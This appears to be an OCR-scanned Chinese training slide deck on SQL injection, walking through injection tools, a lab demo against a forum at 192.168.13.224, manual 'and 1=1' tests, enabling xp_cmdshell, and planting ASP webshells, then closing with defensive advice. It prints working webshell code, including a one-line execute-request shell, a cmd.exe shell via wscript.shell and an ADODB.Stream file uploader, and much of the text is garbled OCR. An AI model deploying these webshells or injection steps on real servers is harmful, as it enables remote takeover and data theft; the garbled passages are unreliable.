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« SQLFATERSZE

> SQLFATLHR

a) PangolinsEF AT A

b) HavijFATLR

c) EFRNFEATLAR

d) DSQLTools; s AT HE

e) NBSEEATLR

f) FIDEAILR

> PA#SQLENRELA

a) Acunetix Web Vulnerability Scanner 8
) IBM Ratfional AppScan 7.8
c) HP Weblnspect
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SQLF A: (Structured Query Language Injection) EMIEER
WWWim O350, mERAEERE—RAIWebTnmERTAK 7], BT
VLB BRI EA B SJOFER A IISQLUEALZ HER, MRERRREE
ISHER S, ATt ARBERKNEE NS L.

OB LEHERSILEN

gg;gg RHME, FHEAS

@B EEMEENE,
ENERREEFF HAISALIE
G EERFTsqliE4)

@F M=l IBATIES
_ HsER i

i OFABEENIT T HTAISAL
184, BIASLENEE
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« SQLEAIERIE

SQL (Structured Query Language) 2—FAkRMEGREER T
H1E S A,

SQLF AT REM EWNEEBRIWeb N AERFFIHSQLIEA
3 PR EREEIEERNEIREAZI RS mEEESY, REBEENERE
FARPIXIE, RAEREEEEERFPYRRAZZRIERGEER PR
, Bl FERIER G, FREEEFERERIE .
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SQLYE A Y By 25 22 i A& B FHDST. NBSIFDomain5SQLA: N Ui
FA4E T H 34 i Web BT H AR LE ISQLIE NI, M EA7SQLIE A A, iE
AT AR I SQLE ) B A 455 B IR 2 NAR A AR B P A .

hitp:/F102. 168, 13. 224

= I il

[EswEAS | [Eemi| | ksl

| wAmERME || EwmE |
| wacaEE || gaRw |

..... Lok SOTERRR

iEFEHAE e

http:/f192. 165. 13. 224/ search. asp?forumid=0
http:/f192 165, 13. 274/ dafanlt. aspTeroupid=1
http:/f192. 165, 13. 224/ showforum. azp?forumid=1
http: /#1932 163 13. 224/ showpost. aspTthreadi =30
http: /#1928 165 13, 284/ showforum. asp?forumi d=3

FIREEER T

%j&ﬁﬁﬁ http: fwww. ax. comfmoe 11 st. aspTid=123

EaliEE ef

http: /192 1865, 13. 224/ shewforum. asp?forumid=1
http:,f192 168 13 284/ shewpost. aspFthreadi d=30
http: /192 165, 13, 284/ showforum. asp?forumi 4=3
http:/ 192 165. 13. 224/ showpost. aspTthreadid=31

VE b EAn e 1Al AL !

SR
http: /f192. 168, 13, 224/ sear ch. asp?forumi 4=0 mHiEA -1
http: /192 168 13 224/ default. asp?eroupi d=1 BiEA - 2
http: /f192 168, 13 224/ showforum. asp? forumi d=1 AlEA - 3
http: /192, 168, 13. 224/ shewpost, asp? threadi d=30 oiEA - 4
http://192 168, 13. 224/ showforum. asp? foruni d=3 BiEA - 5
hitp: /192, 168, 13, 274, showpost. aspTthreadi d=31 AIEEA — 6

ALK, WBAPT A Copyright © 2012 www. echengsof't. com




SQLFANHTE

SQLEANKEHE
SQL;F NI RIE
SQLF AR T HFE

SQLE NI B

AT HR MR BBAFFA Copyright © 2012 www. echengsoft. com



FEITE]

L EqL
HiE " BEREE

SOLE A, (Tszerip ti%ﬁi]%ﬁﬁﬂﬂa%ﬁ]
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SQUEAB TN

g L R Web R 88 F
SHSQUEAL T E

FIUT 5 152 FH B SR 2

s EEXP_CMDSHELLAT $14T1E 5
A BWEBRETLE R
FRASPRE
FElRaERANR
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S . A BB

File. Actions Tools Configuration Help

iONewScan @ @ P & UEQ ¢ OB | & |B |2 || W
|-|—“”"’{S Explarer J;l| D &= | F ] | | @ | |_i| Report | )C' |Sbrt I..ISR.L:ihth:l:,|",|"l.'\|l'\.'\llw.I::I::sxp.cc:m,.r LI Profile; |Default LI Start
] e Wlnesmnrabi"w ST || Sean Aesls Status [ evacunetix WEB APPLICATION SECURITY *

E% e & 5 ScanThread 1 (http://192.168,13,224:80/)  Finished {188 alerts) =
..... [j_-) Site Crawler El ﬂi Web Alerts {.1.88] il 3
----- 4~ Target Finder L E‘ @ Blind 5QL Injection (15) i SAL injection HIGH
----- |}, Subdomain Scanner . @ @ Cross Site Scripting (18) T
----- |4l Blind SQ'._ Injector i E| 0 SOL injection {34} Vulnerability description
--{&} HTTP Editor i B [E] Mogin.asp (3
‘3 HTTP Sniffer Ei B @ UserName 3 This scriptis possibly vulnerable to 30QL Injection attacks.
<5 HTTP Fuzzer i Db variant 1 fEl o
_____ 5 Authentication Tester || 5 ; 0L injection is a vulnerability that allows an attacker to alter
_____ 79 Compare Results | wariant 2 backend SQL statements by manipulating the user input. An SCQL

B Wik Services i variant 3 injection occurs when web applications accept user input that is

- = gl B, o |:| members.asp (1) directly placed into a SCL statement and doesnt properly filter out

4 Web Services Editor o B [F] fprofile.asp (D) derdeTa s Thatarers.

=8 E?"ﬁg“r_aﬁ?" X E’ [] fshowforum.asp (2) This is one of the most common application layer attacks
""" e "‘pﬂ"""’t"’_” Settings PoioBEk [L] /showpost.asp (27) currently being used on the Internet Despite the fact that it is
""" [{I Scan S_Eth”‘gs ; . Application error message {30} 1 relatively easy to protect against, there is a large number of web
""" |&# Scanning Profiles £L ey . S applications vulnerable.

B~ General |;|_ 1 r | 1L
4@ Program Updates [ Activity Window o
10| Version Information |
5P Licersing 04,05 17:34.25, Flush file buffers. e
@ Support Center 04.05 17:34.27, Started scanning http:/ fwww.bbsxp.com/ ...

@ Purchase 04.05 17:34.27, Finished scanning. il
@) User Manual (html) | |04.05 17:34,27, Flush file buffers. L4
48] User Manual {pdf) L =
..... & AruSensor Application Log | Error Log

Ready | ~
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KRBV IESQLF A R

— R, SQLIFEA—REFEETHA:
HTTP://xxx.xxx.xxx/test.aspid=XXZEHHF/ S5 ASPEISM T H,
BEN—1MISMIIAARRE— 128, BNAEAEND %ﬁ ﬁﬁ
%%E%ﬁ,ﬁﬁ%?ﬁ$ IS8, Fet—Wmit. B REEFH
&mmﬁﬂﬁﬂﬂﬂﬁﬁﬁTﬁﬁﬁ ALFEBE A8 ﬁTKﬂEA
M%NWEanﬁﬁéﬁu, HITHERFRLIE, FaESQL
EAMT“@%%%k

SHSQLFEAZHI, FEIWIESKE=>T BH=>InternetitIi=>5H=> 8~
XIF HTTP sEiRE EpTEm & E£iF. W AR E 2R E A IR

, IEER R E7R9HTIP SO0k 552858 1% , NEEREBEZHRRER
—r?kSQLE}\ R EBEINEXTT %7(_ ﬁ S EYNE R R Ih 2R
“Ond ‘| _‘l 7 N “Ond ‘| 277 I/X& wir  »n kk_lkbffj’ﬁ}li??? L —.I-/XIJBC

28 PR B RTEIRIE = 51%#' BEAESQLEA, ?ZD%LIEI%BDE, JUES
HRFE Fr AR 33 4 A\ B S QJE, BRI DB TEBREHEITIEAN
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SQLF NimREF S LA A
HTTP://xxx.xxx.xxx/test.aspid=YY’ (fin—1ES|S), tkAttest. ASPHE
SQLIBAIERT

select * from &R where =YY’ , test.aspiziTH%E;
HTTP://xxx.xxx.xxx/test.asp2p=YY and 1=1, test.aspizfTiEE, MES
HTTP://xxx.xxx.xxx/test.asp2id=YYiz{T4 R E ;
HTTP://xxx.xxx.xxx/test.asp2id=YY and 1=2, test.aspiz{TH % ;

N E=T&FHEHE, dbc.asp—EFESQLFE AiRKE

SQLE N il 4F BB B S 5080 #I i &

HTTP:/ /xxx.xxx.xxx/test.asp2id=YY’ (Mi—1E35|S), tkifabc. ASPHE
SQLIEAIERT

select * from & where FE=YY’ , test.aspiziTH%E;
HTTP://xxx.xxx.xxx/test.asp2id=YY&nb ... 39;1'="1", test.aspiz{TIE
B SHTTP://xxx.xxx.xxx/test.asp2id=YYiz{T4 R E ;
HTTP://xxx.xxx.xxx/test.asp2id=YY&nb ... 39;1'="2", test.aspiziTH

=SEEFE, abc.aspH—EFESQLEANRKE

]

Jk

)

Jk
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HEBFETAS MasqLsEEN T B BE A OR# it ea = IE AR ThEE 50
FEAS: [http://192 188 13224/ showforun. ssp?foruni d=1 |-| }M»{ |E§ﬁaﬂﬁu |
EEE - RlE  milgs

firfh Mm% e I
=]
=]

|| EmES | L EEhl T — &R
et #T IBURLAT I A |

=] i L L 2] !
hocess @ wssar | TR ﬁ; MBS H R e smemrE)

ZaaT HIEE 5436
LFIFAP  dbo g:g;

LI S i B
X | AIEEEE || ehEEE | ]
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AR

oMy L&

*

BEET

i EXP_CMDSHELL A 7

HETYLE TYFE="text/cz="textares, input, body, select, pre; td, thifont—family:

b

CMDir%: {input type=text name=c style="border:@solid lpx"”

\EE_;H'

B[ &

?E}gﬁﬁ |http2;";‘r192. 168. 13. 224/ShowFost. asp?ThreadID=30

e |dir ot

| #F | WEE |mosé$ [XF_CMDSHELL)

F

EER, ERITONS S, FRRIRIREAA “oa” EiREe
EIEIEAFEEAM: 00099 et

Chiml><body>

TEAFEY: fant-sire: 9pt} button {border-width: lpx} . text {border:=zalid 1px}<fSTYLE>

Titler FfE</Title>

(¥Dim objFSO0%>

<HDim fdatak>

%Dim objCountFile®>

Hom error rezume next¥r

¥Set objF30 = Server.Create0bject ("Scripting FileSystemObject™)%>

Hif Trim(request ("syfdpath”) 14" then¥>

Wfdata = request (“cyfddata”)¥>

<%5et objCountFile=objFS0. CreateTextFile (request ("syfdpath”), True)%>
WobjCountFile, 'ﬂrlte fdata¥>

Wif err =0 then¥>

Efont cglor =red ARFFRIIN 1BE EIRISATIE | </ font>

Helzeh,

<font color=red ARTFEM. Al HEIR SRR = HEFS0 font >

Hend 1£%F

Herr. clear®?

Wend 1f%>

MobjCountFile. Close®>

<kSet objCountFile=Nothingh>

<%Zet objF30 = Nothlng‘%}

“form action= "’ method=po

<font color= redhﬁﬁ?’}\jﬂﬁ:f%ﬁﬁé o font 2<br >

{input tly;&]pe text name syfdpath width=32 walue="<¥=server mappath(Request. ServerVariables ("SCRIPT_HAME"))%>" style="border solid 1px" size=803Ctr>

{textarea mame= cyfddata cols=80 rows=10 width=32 style="horder:solid lpx">{/textarea>
<br >Cinput type=submit walue={EFF style="border:szolid lpx"?
<fforme<form action="" method="post™>

size=T3ribr>

{textarea colz=80 rows=20 style="border:=olid 1px">

Heserver. createchject (Twscript. shell™). exec (Temd exe fo” Brequest (")) stdeut. readall¥s

{ftextareard form </ body»</ hinl >

MEE A EH, TR

HHLE —

EHE BHiE o mE —
[EXTEE) | N | et L
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ZIMWebE#IE R

EARD

HETE

EAEE http://192. 168. 13. 224/ShowPost. asp?ThreadlD=30.

wilrE [0 B | Fagta il
IR oo |_[4/-1] |
&

entz and Settings
‘%Inetpub

%Prng;ram Files
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. FHMIEWebShelliFH

> SR AESE. AEESMAURT - AIEADRFRFIF
K WebShellJEE.

> —aERDIERF: <%execute request('") %>
> FHEWebShelimBfs, FHA—AIERSE Pin LEZED

C O file:///C/PIEEEER /vebshel 1/—ANERDE P asp— AR DE A3 fcivei. htnl
—ATEARD (Uexecute request ("17)%>) RISHIEE R Fim

ASP URL: [http:/192, 168, 13.224/datefxxdoc. asp A Fasp MEHR:

zet 1P=szerver. createCbject (“Adodhb. Stream”)
1F. Open

1F. Tvpe=2

1P.CharSet="gh2312"

1P . writetext request(“p")

1P. SaveToFile server.mappath("gxzdoc. asp”), 2

| |l

B - &

<% dim objF30 %>

<% dim fdata %>

<% dim objCountFile %>

<% on error resume next %>

<% Set objF30 = Serwer.Createlbject ("Scripting. FileSvatemObiect™) %>
<% if Trim(request ("syfdpath”))<>"" then %> d |

<% fdata = request ("cyfddata’) K> 4% %% % Response.write 7 AR |” %> % Response.write ”

e %>
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FIMERASQLUEA TR EZASPARG
Dzt [@eete (DewEa deeps [ @mEsse Eeers [Pwprs QxTes

JEFRZER
=) =hfF bR O ehd bERiR O shEliEE O FELRERE O BEEY

-HErRE
sIF EERRETEE TRITE, BRIk 3R EE L& 1T EM FETINEES Cookies!
IR http: # fwww. e com/bbsfupfile. asp -
{EXFMidE: http: /7192, 168, 13. 224/ login. asp .

O BMARIIRS G BiERIS
I CihDocuments and Settings"uﬁ;dministratnr"x;iﬁ.\.share\xxdnc. asp = |

Cookies: i1scookies=0;
| &
Y

FRBHER
WebShellHidh: http: /192 168 13, 284/ xxdac. asp 7

HTTFS1.1 200 0K

Date: Fri, 30 Mar 2012 05:29:57 GNT

Server: Microseft-IIS 6.0

MicrosoftOfficelebServer: 5.0_Fub

K-Fowered-By: ASF. HET

Content—Length: 128

Content—Type: textfhtml; Charszet=GEZI1Z

Set—Cookie! Themes=default; expires=Thn, 29-Mar-Z2012 16:00:00 GMT; path=/
Set—Cookie: ASPSESSIONIDCESQDCDC=IJFFECECEGHCTEMDLHALFHOG, path=y

Cache—control: private

Yzeript language="JavaScript” type="text/javascript™>
lert ( FAPBHARA ),

window. history. back(];
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© LfEASPADRY, ENIEHIEHELE

& hack's MY WebShell - 192,168.13.224

R R

i -8 -~ M -

b |C: “testhweb

STEHRE: BRG] RERIC ] IR0 ] HERIH] ERISHE] (RELEFE]
THATHEE: BREEFR] EiEE] DofbEf] [ONDEpsriT] EEE|E] [FRRS] CEMEERF] REERER]
EHBEETNHG: [BHEERF] HERTEAELE] | [BREFE]

[database] |HHEE S 352h [ addPost. asp
[Imzgze=] |MRE Sl 3Bzh [Tl adaTopic. asp
[readme] |MiE: Bl 3Esh [T Admin_Default, azp

[Theme=] |HHEE Bl ¥2Eh
[UpFile] [HE: B #Bah
[utility] [ME: B $Bah
[iml] [HHEE B #zh

& Admin_Forum. asp
[]Admin FS0. asp

I:I Admin_Other. asp
E Admin_Keputation. asp
[l Adnin Setup. asp
|:] Admin Tacl. a=p
&) Admin_User. asp
|___| Admin XML. asp

|:| APT Regquest. asp
E| APT Responsze. asp
I:l Archiver. asp

[ bakf default. asp
L bale_default. asp
[T Bank. a=p
[C|BBS¥P_Class. asp
I:]Compact.asp

[T confi g. asp

[T conm. asp

I:l Cookies. asp

EI Createllser. asp
E:jDefault.asp

9K
12K
13K
34K
10K
11K
4K
STE
14K
30K
19K
gk
BE
9K
10K
10K
BE
33K
EE
2K
4K
0K
9K
10K

2008-07-07
20058-07-07
2008-06-04
2008-07-09
2007T-1E2-26
2008-07-09
2005-07-09
2008-03-20
2005-07-07
2008-07-09
2008-01-21
2007T-12-E5
2005-03-05
2008-06-02
2005-07-16
2008-07-18
20053-07-09
2011-01-25
2007-12-04
2008-11-2T
2005-07-26
2007-12-04
2005-04-30
2008-07-16
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11:31
11:31
16:42
10:31
14:00
11:00
10:33
1623
11:31
10:31
15:59
14:56
09:15
11:46
11:09
11:09
10:31
17:30
16:18
13:12
14:44
16:16
10:41
11:09

WiE WiEE B B
iR WiEE B fBch
WiE MR B I5ED
WiE WEE B Bah
iR MR Bl fBch
iR WEE B #Beh
‘WiE W B 3D
WiE WiEE B iBch
wiE WRs B 35h
WiE WEE B Bah
wiE W B 355D
WiE WEE B 1Bsh
WiE WEE B tBah
WiE WEE B 1Beh
WiE WiEE B tBah
WiE M B I5ED
iR WiEE B fBch
WiE M B IBEh
iR WiEE B fBch
WiE MR B 35D
iR WiEE B fBch
WiE MRS 2 35D
iR WEE B #Beh
WiE MRS B I5ED
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B PRI S B A T RIE: (R PmRIE A A
B, ERBRE. FAKEWebI KBNMREREREH I ERNE
P, LIRS BRAETELOBARIE, 8RB
Lo

LIRERAH : WebRRFRRIZRIEILR A RARD . HRAK
FEEREVEE.
XHHAMERETII—: SQUEABE R T AL 7452k & it
MR, EUENEIIRTRIERDA, BIRH A TII— R
2, FNGBENRESSEITES, MRE02E D RBDT
BAE R,

X NERT R E R, SRR @1=" % () - FH2.

P RERIAIRMEIE: SO%X HTMURISQUES T8 i FA 0 2 538 T 43D
| DU N IR P IR AR AT
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HRE%: FHENRKEXERFENEARZ AR
ZEREIRAIE: TR FERAMMIESRENARER, AFEFEAEN
Javartry. catch. finallyf]s s 408 Sk IgsEiR,
FHRENXRHEEN : DURATEEMXRIZITWebikF 28 ERTZ
FRN AR

BWEBRR S e AR ER S22 0 & -

PREIZIEEN R ER .

NEEFREREFHFEIRE.

EMIH &2 AW — 2R SQLFE A#&N T E# TN, X
RN LESQLE AR o

WIEKENZ™EAE, stE—EREE LR KSQLE AIET
TR IEEHIT o

MWEMELEl BT FHSQLENRE.
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Any Questions?
W\ '/,

>
- f

<, AN

THANK YOU!
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